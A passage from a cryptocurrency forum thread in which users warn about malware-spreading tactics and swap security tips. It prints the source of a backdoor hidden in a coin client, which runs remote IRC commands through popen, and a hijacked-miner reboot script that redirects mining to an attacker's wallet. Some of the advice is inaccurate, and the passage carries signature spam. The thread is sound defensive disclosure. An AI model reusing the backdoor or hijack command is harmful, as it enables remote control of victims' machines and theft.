The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Sasuke.Sasuke
Jr. Member
*
Offline Offline

Activity: 39


View Profile
December 08, 2016, 05:36:23 AM
 #88

Useful thread..  I always use sandboxie and shado defender before installing or running any new program now a days.. .  And mediam level of hackers fears of virustotal because they send the file for further analysis(as what i've heard)  and their FUD malware loose its FUD ability.  So my suggestion will be...  Use sandboxie or any similar software and still use softwares like shadow defender for any kind of new programs... .  And before doing any thing just scan it in virustotal if you can.

Note: just don't trust any new person or software just like that.

In between the user(shsfhs) above me just quoted the original thread and no reply (seems like a new botter in town).
ioanbtc
Sr. Member
****
Offline Offline

Activity: 271


View Profile WWW
December 27, 2016, 09:34:23 PM
 #89

If i use antymalwarebytes i can be protected?

forces1234
Member
**
Offline Offline

Activity: 116


View Profile
December 29, 2016, 10:50:30 PM
 #90

is there any good anti virus to handle it??
indiemax
Hero Member
*****
Offline Offline

Activity: 720


View Profile
January 19, 2017, 06:18:42 PM
 #91

Beware of links sent to your PM box, even ones that look like a link to a thread on the forum.
JanpriX
Hero Member
*****
Online Online

Activity: 672


Buy The Fucking Dip


View Profile
February 11, 2017, 11:44:10 PM
 #92

is there any good anti virus to handle it??

I would like to ask this same question here. Can anyone site a software/site that can provide better anti-malware program for our PC? I know that being cautious in clicking/visiting links will avert you from malware but it wouldn't hurt if we can install a program that has good reputation in stopping malwares getting inside our machines.

.

███████████████████████
███████████████████████████
█████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████
███████████████
██████████████
███████████████
██████████████
███████████████
██████████████
███████████████
██████████████
███████████████
██████████████
███████████████
██████████████
███████████████
██████████████
███████████████
██████████████
███████████████
██████████████
███████████████
██████████████
█████████████
██████████████
██████████████
██████████████
██████████████
██████████████
███████████████
██████████████
███████████████
██████████████
███████████████
█████████
███████████████
████████
████████████████████
█████████
██████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
█████████████████████████████
███████████████████████████
███████████████████████












caribou2357
Newbie
*
Offline Offline

Activity: 10


View Profile
February 15, 2017, 06:35:08 PM
 #93

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
February 15, 2017, 07:16:09 PM
 #94

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

 there is no comprehensive overall protection, think, rather in layers. a vpn, a good antivirus, spybot s&d, hosts file (hostsman), sandboxie, a virtual machine should all be in place.

  avoid win 10
  if u use 7, 8, or 8.1, remove or do not install the microsoft spyware
   even better, use mac or linux

there is freeware available to do all this  Cheesy

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity  |  Sign-up @ Aurovine to get FREE HD music ... and coins!|  *TIPs*  | VNL  Vkpn45TSLR1jBa34pyrTwWDzADTEyviz4E   | TALK   CXvZkT13CNjn3ScizW1oEHWNVEAduJuKCJ   |   BTC   18wWrEfcA62D5Xmza1rRAw5cgcqwCa2YFH   |    ELP  e7rPHqbczFnUdyBk2XEdm9tj4fqjGnCqK4     Buy - Sell on          Cryptopia  |  Bleutrade   |    Poswallet     |  an experiment in trust and control - FLYcoin   |   FATiB27UfQyySJCyM1dEQTaxMdZgqxHZ4y
MWesterweele
Hero Member
*****
Offline Offline

Activity: 672



View Profile
February 22, 2017, 06:32:40 AM
 #95

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.


thanks for informing us,however we must know how to avoid this. we all give importance to bitcoin,therfore we must take care of it. there are some kind of people that wants to earn bitcoin without giving some effort on it,they just want to take it to others easily. secure your browsers , dont click anything that is not important ,look may be deceiving brothers.

..C..
.....................
........What is C?.........
..............
...........ICO            Dec 1st – Dec 30th............
       ............Open            Dec 1st- Dec 30th............
...................ANN thread      Bounty....................

redblue!!
Newbie
*
Offline Offline

Activity: 7


View Profile
February 24, 2017, 06:29:58 AM
 #96

Thank you .. I think it is very good information for me as a beginner. I will always support you.
superresistant
Legendary
*
Offline Offline

Activity: 1680



View Profile
February 25, 2017, 06:55:19 PM
 #97

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.

Here's my bag so you don't ask : Bitcoin, tenX, iexec, byteball and pepecash
rebel69
Member
**
Offline Offline

Activity: 67


View Profile
February 27, 2017, 07:16:25 AM
 #98

THANK YOU FOR THE INFORMATION MY FRIEND  Grin

passwordnow
Hero Member
*****
Offline Offline

Activity: 616



View Profile
February 27, 2017, 01:47:25 PM
 #99

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.



         ▄▄██████████▄▄
      ▄█████████████████                                ▄▄▄▄     ▄▄▄▄     ▄▄▄▄
    ▄███████▀▀   ▀▀██████                              ██████   ██████   ██████
   ▄██████▀        ██████                              ▀████▀   ▀████▀   ▀████▀
  ▐██████          ▀▀▀▀▀▀
  ██████
 ▐██████
 ██████      ███████████▌    ████████▄▄       ▄███▌     ▄██████████ ███████████▌
▐██████      ███████████    ▐███   ▀███▌     ▄████▌     ███▌           ▐███
██████▌          ██████▌    ███▌    ███▌    ███▀███     ███            ███▌
██████▌          ██████    ▐███▄▄▄▄███▀    ███  ███    ▐█████████      ███
███████         ███████    ████▀▀▀███▄    ███   ███▌   ███▀▀▀▀▀▀      ▐███
 ▀███████▄▄▄▄▄████████    ▐███     ███  ▄██████████▌  ▐███            ███▌
  ▀████████████████▀      ███▌    ▐███ ▄███     ▐███  ███▌           ▐███
     ▀▀███████▀▀▀         ▀▀▀     ▀▀▀▀ ▀▀▀       ▀▀▀  ▀▀▀            ▀▀▀▀

║▮
║▮
║▮

▮║
▮║
▮║



                 ▄████▄▄    ▄
██             ████████████▀
████▄         █████████████▀
▀████████▄▄   █████████████
▄▄█████████████████████████
██████████████████████████
  ▀██████████████████████
   █████████████████████
    ▀█████████████████▀
      ▄█████████████▀
▄▄███████████████▀
   ▀▀▀▀▀▀▀▀▀▀▀



       ▄▄▄▄▄▄
    ▄████████
    █████▀▀▀▀
   ▐████
   ▐████
████████████
████████████
   ▐████
   ▐████
   ▐████
   ▐████
   ▐████




                      ▄▄████
                ▄▄▄████████▌
          ▄▄▄███████▀▄█████
     ▄▄█████████▀▀ ▄██████▌
▄▄███████████▀  ▄█████████
 ▀▀▀█████▀    ▄██████████▌
       ██   █████████████
        █▄ █████████████▌
        ▐█▄███▀▀████████
         ███▀    ▀▀████▌
                    ▀▀█


                   ▄▄▄    ▄▄██▄▄
                   ██▀▀██████████
                  ██     ████████
                 ▐█▀      ▀████▀
   ▄▄▄▄    ▄▄██████████▄▄    ▄▄▄▄
 ▄████████████████████████████████▄
▐██████████████████████████████████▌
▐██████████   ▀██████▀   ███████████
 █████████▌    ██████    ██████████
  ▀██████████████████████████████▀
   ▀████████▀▀████████▀▀████████▀
     ▀███████▄        ▄████████▀
       ▀████████████████████▀
          ▀▀▀▀█████████▀▀▀▀
vapourminer
Legendary
*
Offline Offline

Activity: 1423

what is this "brake pedal" you speak of?


View Profile
February 27, 2017, 02:00:41 PM
 #100

formatting/reinstalling an OS on a computer over and over does not reduce its lifespan. its one of the surest way of getting rid of suspected virus/malware.

if you were thinking of writes to SSDs, formatting/reinstalling will hardly reduce its effective lifespan, most will be long obsolete before they wear out.

whenever i set a new rig (mining or otherwise) up i image the OS as soon as its patched up and all essential programs are installed. that way all i need to do to go to a new, clean baseline OS is a one shot restore that takes minutes.
Cherylstar86
Sr. Member
****
Offline Offline

Activity: 336



View Profile
March 04, 2017, 11:14:43 AM
 #101

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.

Oh I see more optional solutions to help a lot of problems raised on this thread but, you're right its not really good to format your pc immediately just to give up solving the malware infection while OS is still running. For you to make the lifespan of your computer you must download the most reliable pc security that would take all the worries you have, and I can recommend  eset nod32 antivirus latest version now available if your search on their site online; even trial version works totally fine.

ownageplocks
Member
**
Offline Offline

Activity: 97


View Profile
March 10, 2017, 12:42:46 AM
 #102

Does this include the malware I've seen that changes any bitcoin address you copy to your clipboard to an unsavory characters bitcoin address. When you unknowingly paste their address and press send, you lose your precious coin forever. Just remember to always check the sending address twice!

RavenOffice
Newbie
*
Offline Offline

Activity: 8


View Profile
March 15, 2017, 03:06:53 PM
 #103

Thanks for sharing! I've added some of these malicious sites to CoinJabber.com a place for users to rate and review cryptocurrency sites...Basically yelp for Crypto

https://www.coinjabber.com/
Mumbeeptind1963
Hero Member
*****
Offline Offline

Activity: 546



View Profile WWW
March 29, 2017, 04:54:18 PM
 #104

correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.

We need to be vigilant in all our actions. We should look to the link above the browser everytime we are opening it. Hackers may hack our account by making us fool. Sometimes they are creating websites that are like be the same like the legit ones , just look to the link very carefully to avoid problems.

         ▄▄▀▀▄▄
     ▄▄▀▀  ▄▄  ▀▀▄▄
 ▄▄▀▀  ▄▄▀▀  ▀▀▄▄  ▀▀▄▄
█  ▄▄▀▀          ▀▀▄▄  █
█ █   ██▄▄     ▄██   █ █
█ █   ▄ ▀▀█▄▄ ▀▀██   █ █
█ █   ███▄ ▀▀██ ██   █ █
█ █   ██      ▀ ██   █ █
█ █   ██        ██   █ █
█  ▀▀▄▄          ▄▄▀▀  █
 ▀▀▄▄  ▀▀▄▄  ▄▄▀▀  ▄▄▀▀
     ▀▀▄▄  ▀▀  ▄▄▀▀
         ▀▀▄▄▀▀
Modex              
SMART CONTRACT MARKETPLACE
██▄▄
████  ██▄▄
████  ████
████  ████
████  ████
████  ████
████  ████
████  ████

████  ████

████  ████

████  ████

▀▀██  ████

      ▀▀██
TWITTER          LINKEDIN          SLACK
▬▬▬▬▬    FACEBOOK          TELEGRAM    ▬▬▬▬▬
DEVELOP  ●  DISTRIBUTE  ●  DEPLOY
██▄▄
████  ██▄▄
████  ████
████  ████
████  ████
████  ████
████  ████
████  ████

████  ████

████  ████

████  ████

▀▀██  ████

      ▀▀██
██▄▄
████  ██▄▄
████  ████
████  ████
████  ████
████  ████
████  ████
████  ████

████  ████

████  ████

████  ████

▀▀██  ████

      ▀▀██
karmamiu
Sr. Member
****
Offline Offline

Activity: 266



View Profile
April 02, 2017, 07:40:35 AM
 #105

I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.

<

         %%%%%%%%%%(         
      %%%%%%%%%%%%%  %%     
    %%%%%%%%%%%%%%  .%%%%   
   %%%%%%%%        %%%%%%%   
  /%%%%%%           %%%%%%/ 
  %%%%%%(           (%%%%%% 
  %%%%%%(           (%%%%%% 
  ,%%%%%%           %%%%%%, 
   %%%%%%%%       %%%%%%%%   
    %%%%%%%%%%%%%%%%%%%%%   
      %%%%%%%%%%%%%%%%%     
         %%%%%%%%%%%       
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
.
. OPEN MONEY PLATFORM .
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
{}
>
shewasfourteen
Sr. Member
****
Offline Offline

Activity: 308



View Profile
April 02, 2017, 12:25:47 PM
 #106

I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.

Bitcoin User are definetely targets for hackers, especially for script kiddies, hobby hackers, and semi professional hackers.


███ █ █
███ █ █
███ █ █
███ █ █
███ █ █
███ █ █
███ █ █
███ █ █
███ █ █
███ █ █
███ █ █
███ █ █
███ █ █

█ █ ███
█ █ ███
█ █ ███
█ █ ███
█ █ ███
█ █ ███
█ █ ███
█ █ ███
█ █ ███
█ █ ███
█ █ ███
█ █ ███
█ █ ███
●  Whitepaper
●  ANN Thread
●  Reddit
●  Telegram
●  Twitter
●  Facebook

███
███
███
███
███
███
███
███
███
███
███
███
███
sergio
Sr. Member
****
Offline Offline

Activity: 306


View Profile WWW
April 06, 2017, 09:31:22 AM
 #107

I recommend  using Linux for any PC running a  full node, Linux is much more secure than windows.

The safe way of doing this is to create a special account for the node, and make sure that wallet.dat can only be read by the owner, not others, not the group, only the owner of the account.

Then create a separate account for your regular usage, that way in the event that you do get a virus, the virus would run under the ownership of the account that got the virus, and not under the ownership of the account that runs the full node, this way your bitcoins, litecoins, dash, etc they will be safe.

For extra security Trezor and Ledger Nano S are the best.

Both are great hardware wallets, and both have features that are missing on the other wallet, trezor has support for a password manager, and ledger has support for litecoins.

I recommend to have both, for traveling by plane the Ledger has the advantage that looks like a usb stick.
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
April 14, 2017, 12:09:46 AM
 #108

I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.

Bitcoin User are definetely targets for hackers, especially for script kiddies, hobby hackers, and semi professional hackers.

You know it.. and so did "Satoshi".. Shocked

He/ they are cryptoFIAT banking on it. (pun intended) Cheesy

phila
Newbie
*
Offline Offline

Activity: 28


View Profile
April 14, 2017, 01:20:27 PM
 #109

My ethmining is being hijacked.

Ok so this morning after waking up one of my rigs was mining on nicehash, but I was mining on miningpoolhub and didn't specify a failover.  In my logs I discovered reboot.bat file was uploaded through ethman.exe and ran remotely.

I reckon that's why Claymore said in his readme:
"Warning: use negative option value or disable remote management entirely if you think that you can be attacked via this port!"

I had it on a positive number in order to manage, but how did a hacker get access over the internet to manage my miner. I consider myself paranoid careful and usually take all precautions.  Is this a mistake on my side or is it just that easy to access someone's EthDcrMiner64 remotely? Does this mean files might be compromised or is it more like someone has my external IP, will a vpn make a difference? Any advice is appreciated.

I replaced my Claymore folder with a new one and made most files inside read-only, but how do I know I am not still compromised, how much access does this hacker have now and what should I do to ensure further safety?  As you can see inside the reboot.bat file the hacker's bitcoin address: "1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M" is busy stealing quite a nice sum of equihash at the moment.

02:00:08:453   6f2c   Remote management: file reboot.bat was downloaded
02:00:08:454   6f2c   srv bs: 0
02:00:08:454   6f2c   sent: 40
02:00:09:231   17d8   GPU0 t=79C fan=32%, GPU1 t=79C fan=31%
xxxxxxxxx
xxxxxxxxx
xxxxxxxxx
02:00:09:887   397c   ETH: 04/14/17-02:00:09 - New job from europe.ethash-
hub.miningpoolhub.com:17020
02:00:09:887   397c   target: 0x0000000112e0be82 (diff: 4000MH), epoch #117
02:00:09:888   397c   ETH - Total Speed: 53.104 Mh/s, Total Shares: 19, Rejected: 0, Time:

00:22
02:00:09:888   397c   ETH: GPU0 26.859 Mh/s, GPU1 26.244 Mh/s
02:00:09:889   397c    DCR - Total Speed: 1593.105 Mh/s, Total Shares: 123, Rejected: 1
02:00:09:889   397c    DCR: GPU0 805.781 Mh/s, GPU1 787.324 Mh/s
02:00:10:231   406c   recv: 73
02:00:10:232   406c   srv pck: 73
02:00:10:232   406c   Remote management: file reboot.bat was uploaded
02:00:10:232   406c   srv bs: 0
02:00:10:233   406c   sent: 682
02:00:10:604   7608   recv: 51
xxxxxxxxxx
02:00:13:363   689c   Remote management required restart
02:00:13:364   689c   Rebooting
02:00:13:377   4630   srv bs: 0
02:00:13:377   4630   sent: 210

==================reboot.bat========================
"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe" -epool stratum

+tcp://daggerhashimoto.hk.nicehash.com:3353 -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -

esm 3 -allpools 1 -estale 0 -dpool stratum+tcp://decred.eu.nicehash.com:3354 -dwal

1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x
8xbt.com
Sr. Member
****
Offline Offline

Activity: 263


发XBT - Chinese Bitcoiner


View Profile WWW
April 17, 2017, 12:25:40 AM
 #110

Does the malware affects desktop/laptop computer only? Does it affects iPhone/iOS user?

ownageplocks
Member
**
Offline Offline

Activity: 97


View Profile
April 18, 2017, 03:15:49 PM
 #111

This forum is being targeted heavily by malware developers because it's a quick target for people who have money in crypto. It's difficult to detect as you said because of crypters. It's not uncommon for them to spoof file extensions too. What looks like a .jpg could just be a hidden executable. Stay safe out there.

freebtc4e
Sr. Member
****
Offline Offline

Activity: 420

just passionate


View Profile
April 28, 2017, 03:41:55 PM
 #112

I'm adding this to the list of possible scams:

Of which there are 2 lines
Which I have underlined



Are you new to trading cryptocurrencies? Do you want to learn how to earn your slice in crypto riches?
Read our guides written by the Crypto Traders Room community, for FREE! And get your foot wet..

Guide on trading cryptocurrencies in general:

https://docs.google.com/document/d/1YgB5Jf1jbm8OzT9372ZqCkBnTQui6gkx0SICKq61Pv0/edit#

Guide on trading on margin (with leverage) on Poloniex exchange:

https://docs.google.com/document/d/1ex37eOVMCWJRHXLN6KLQcrMPsUbQw15jAFrLeO1aSUk/edit?usp=sharing

Join our chat room by following this link:
https://discord.gg/9h4kjAE

- be sure to check out Discord app on iOS or android
- preferred to use discord dekstop application for PC use rather than browser




mafia15
Member
**
Offline Offline

Activity: 60


View Profile
May 04, 2017, 03:46:06 PM
 #113

this one is a scam .. gonna add this

----- maffiemase ------
zigoter
Newbie
*
Offline Offline

Activity: 28


View Profile
May 11, 2017, 01:02:27 AM
 #114

Never Use a Wallet Hacked

Changing passwords is not a solution. Because of the possibility of all the private key in your wallet that has been hacked it is already known the hacker and private key can not be replaced.

Leave the wallet that has been hacked. Use the new wallet.
sarfield
Full Member
***
Offline Offline

Activity: 210



View Profile
May 13, 2017, 04:20:37 AM
 #115

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.
Oh I see more optional solutions to help a lot of problems raised on this thread but, you're right its not really good to format your pc immediately just to give up solving the malware infection while OS is still running. For you to make the lifespan of your computer you must download the most reliable pc security that would take all the worries you have, and I can recommend  eset nod32 antivirus latest version now available if your search on their site online; even trial version works totally fine.
I want to ask, how the characteristics of a secure application to install? Because I often installing the applications I need from the internet...

CHANGE — First Decentralised Global Crypto Bank | ICO | DISCUSSION
sarfield
Full Member
***
Offline Offline

Activity: 210



View Profile
May 13, 2017, 08:15:26 AM
 #116

I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.

Basically the user's caution is necessary to keep computer software safe

CHANGE — First Decentralised Global Crypto Bank | ICO | DISCUSSION
joeyjojoshb
Jr. Member
*
Offline Offline

Activity: 42


View Profile
May 25, 2017, 12:45:22 AM
 #117

there is a easy way to avoid this.  Dont install every crypto coin that comes out and try their software if you dont fully understand their code or its not fully evaluated.  Also dont run it on machines or networks where you have finances.  Try to vmware/virtual box it before you add it to your massive list of altcoins you invest in.
thecryptoconsultant
Full Member
***
Offline Offline

Activity: 124

Check thecryptoconsultant.com for Newbie training


View Profile WWW
May 25, 2017, 12:05:31 PM
 #118

Hi Security aware people who commented in here

Do you know if all the TOP20 blockchains have been tested just like bitcoin code has been or is there a risk that we discover that a network like maidsafecoin or Waves is a scam ?

Thanks for commenting your thoughts.

Victor

You want to learn more about Bitcoin but there is too much information available, but you don't have enough time, but you don't know who to trust, but you don't know which website is trustworthy. Come to thecryptoconsultant.com to get you started safely with Bitcoin!
niisarearning
Sr. Member
****
Offline Offline

Activity: 252


★ BitClave ICO. Join NOW ★


View Profile
June 06, 2017, 10:25:23 AM
 #119

I am also getting some personal message from newbies asking skype and gmail id for better earning and some spam post more now a days even some links i checked its completely not secured

8xbt.com
Sr. Member
****
Offline Offline

Activity: 263


发XBT - Chinese Bitcoiner


View Profile WWW
June 06, 2017, 10:53:57 AM
 #120

I am also getting some personal message from newbies asking skype and gmail id for better earning and some spam post more now a days even some links i checked its completely not secured

Just avoid to click on any suspicious URL or links/downloads should be enough.

2econd
Full Member
***
Offline Offline

Activity: 196


View Profile
June 09, 2017, 01:51:22 PM
 #121

Thanks for sharing, wouldn't want to be that guy losing it all.

████→→       ● DeepOnion                                                                       ✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯
████→→       ● Tor integrated, 100% anonymous!                                ✯      Get Your FREE Coins NOW!      ✯
████→→       ● Free Airdrop! (No ICO, No Crowdfund)                       ✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯
yusuf98
Full Member
***
Offline Offline

Activity: 154



View Profile
June 09, 2017, 03:31:35 PM
 #122

Could you please post the coin's name and maybe others that you may have found ?
Yes it is very helpful for the advancement of investing new coin

▀▀▀▀▀▀▀▀ BRING YOUR MONEY TO LIFE ▀▀▀▀▀▀▀▀
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ STACK ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
●● TelegramTwitterFacebookDiscord ●●
AmarO
Member
**
Offline Offline

Activity: 84


View Profile
June 11, 2017, 01:01:46 AM
 #123

Thanks a lot, great educational and eye opening post.
Edunitt
Newbie
*
Offline Offline

Activity: 29


View Profile WWW
June 11, 2017, 01:13:39 AM
 #124

Not all heroes wear capes.

Thank you very much.

criptomoedasfacil.com
wantjokull
Sr. Member
****
Offline Offline

Activity: 350



View Profile
June 14, 2017, 01:27:38 AM
 #125

That's dangerous. Isn't there any precautions by forum Devs for such cyber attacks. It is easy to open ANN threads or any topic by anyone and thats freedom completely agreed. But what if shit are opened up by attackers everyday and we got victims everyday. This is not healthy for forum really.

MOBSSTER
Member
**
Offline Offline

Activity: 88


View Profile WWW
June 14, 2017, 07:19:58 PM
 #126

So using Linux or Ubuntu Helps?
vapourminer
Legendary
*
Offline Offline

Activity: 1423

what is this "brake pedal" you speak of?


View Profile
June 14, 2017, 11:06:43 PM
 #127

So using Linux or Ubuntu Helps?

it helps as most malware targets windows. with windows best practice is up to date patches, good firewall good antivirus and good internet hygiene.

*nix/apple is not 100 % immune though.

MWesterweele
Hero Member
*****
Offline Offline

Activity: 672



View Profile
June 16, 2017, 05:37:17 PM
 #128

So using Linux or Ubuntu Helps?
yes it helps sometimes. linux is a open source software, and as what they are saying it is hard for the virus to enter that software, because of its highly recommended security, although for me it is hard to use linux because i think it is not user friendly but i believe it will save us from different virus attacks. be wise in all our clicking website in the net now.

..C..
.....................
........What is C?.........
..............
...........ICO            Dec 1st – Dec 30th............
       ............Open            Dec 1st- Dec 30th............
...................ANN thread      Bounty....................

JosephTam
Newbie
*
Offline Offline

Activity: 23


View Profile
June 16, 2017, 05:52:45 PM
 #129

Thanks for the heads up. I'm new to buying altcoins and this has to be one of my biggest concerns. Are there any programs or software that you recommend I download to protect from viruses or malware?

Thanks
MWesterweele
Hero Member
*****
Offline Offline

Activity: 672



View Profile
June 17, 2017, 11:03:10 AM
 #130

Thanks for the heads up. I'm new to buying altcoins and this has to be one of my biggest concerns. Are there any programs or software that you recommend I download to protect from viruses or malware?

Thanks
For your pc? If youre software is windows, windows defender for me is enough. Just be wise dont click any suspicious links to avoid getting a virus. Always updates you software and anti virus. But if you are using linux. Then i think you are safe because it is not easy for virus to go inside the software.

..C..
.....................
........What is C?.........
..............
...........ICO            Dec 1st – Dec 30th............
       ............Open            Dec 1st- Dec 30th............
...................ANN thread      Bounty....................

silverkamote
Newbie
*
Offline Offline

Activity: 28


View Profile
June 19, 2017, 08:32:35 AM
 #131

thanks op for the info . ill just add these do you know that There are three traditional ways for malware and viruses to generate bitcoins for their creators. Direct theft of private keys from bitcoin wallets, parasitic bots that mine bitcoin with stolen processing power, and Ransomware that encrypts files and demands a bitcoin payment to restore access.
c6m0h3
Jr. Member
*
